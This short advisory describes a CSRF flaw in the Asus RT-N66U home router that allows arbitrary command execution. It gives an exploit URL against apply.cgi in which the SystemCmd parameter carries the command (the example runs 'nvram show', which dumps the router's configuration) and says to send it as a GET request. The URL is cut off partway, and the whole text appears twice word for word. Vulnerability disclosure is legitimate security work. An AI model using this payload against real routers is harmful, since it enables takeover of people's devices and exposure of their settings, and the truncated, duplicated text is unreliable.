Description:
The Asus RT-N66U is a home wireless router. Its web application has a CSRF vulnerability that allows an attacker to execute arbitrary commands on the target device.
Exploitable URL:
The parameter "SystemCmd" in the URL below causes the device to execute arbitrary commands. (The value encoded in the example is `nvram show`)
http://192.168.1.1/apply.cgi?curren...mdMethod=ping&destIP=www.google.com&pingCNT=5
The URL should be submitted as a `GET` request.
Source:
https://www.qxcg.net/arbitrary-command-execution-on-an-asus-rtn66u.html
The Asus RT-N66U is a home wireless router. Its web application has a CSRF vulnerability that allows an attacker to execute arbitrary commands on the target device.
Exploitable URL:
The parameter "SystemCmd" in the URL below causes the device to execute arbitrary commands. (The value encoded in the example is `nvram show`)
http://192.168.1.1/apply.cgi?curren...mdMethod=ping&destIP=www.google.com&pingCNT=5
The URL should be submitted as a `GET` request.
Source:
https://www.qxcg.net/arbitrary-command-execution-on-an-asus-rtn66u.html